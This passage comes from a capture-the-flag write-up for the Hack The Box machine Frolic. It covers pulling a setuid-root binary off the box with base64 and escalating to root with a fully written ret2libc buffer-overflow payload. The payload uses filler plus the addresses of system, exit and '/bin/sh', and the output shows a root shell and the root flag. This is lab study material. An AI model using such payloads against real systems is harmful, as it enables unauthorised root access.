	/lib/ld-linux.so.2 (0xb7fdb000)
```

Three things matter here: the file is setuid root (`-rwsr-xr-x`, owner root), it is a 32-bit dynamically linked binary (i386 libc), and ldd prints libc's load address 0xb7e19000. That address is what the later payload is built from; it is only reliable because ASLR is disabled on the box, otherwise every run would load libc somewhere else.
16. Copy the binary to the attacking machine via base64

```
www-data@frolic:/home/ayush/.binary$ base64 ./rop -w 0
.............

┌──(kali㉿kali)-[~/桌面]
└─$ echo ....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 | base64 -d > rop
```

(The base64 output above is abridged; the full string is what `base64 ./rop -w 0` printed on the box.) Comparing `md5sum rop` on both ends confirms the transfer was clean.
17. This step involves a buffer-overflow analysis of the rop binary. I do not know how to do that yet, and the current OSCP exam no longer tests it, so I will learn it later when I have time and write a few dedicated articles on buffer overflows.
18. For now, use the method from the reference write-up directly to escalate and read the final flag

```
www-data@frolic:/tmp$ cd /home/ayush/.binary
www-data@frolic:/home/ayush/.binary$ ls
rop
www-data@frolic:/home/ayush/.binary$ ./rop $(python -c 'print("a"*52 + "\xa0\x3d\xe5\xb7" + "\xd0\x79\xe4\xb7" + "\x0b\x4a\xf7\xb7")')
id
uid=0(root) gid=33(www-data) groups=33(www-data)
cat /root/root.txt
05afffd0ae064995a8a4cb627e499859
```

How the payload is laid out: 52 bytes of filler reach the saved return address, which is overwritten with system() in libc (0xb7e53da0, written little-endian as `\xa0\x3d\xe5\xb7`). The next dword is where system() will "return" to, exit() (0xb7e479d0), so the process ends cleanly instead of crashing. The dword after that is system()'s first argument, the address of the string "/bin/sh" inside libc itself (0xb7f74a0b). Because the binary is setuid root, the shell spawned by system() runs with uid 0. Subtracting the libc base from ldd (0xb7e19000) gives the offsets 0x3ada0, 0x2e9d0 and 0x15ba0b, which can be cross-checked on the box with `readelf -s /lib/i386-linux-gnu/libc.so.6 | grep -w system` and `strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh`.
0x03 Completion proof
https://www.hackthebox.com/achievement/machine/1705469/158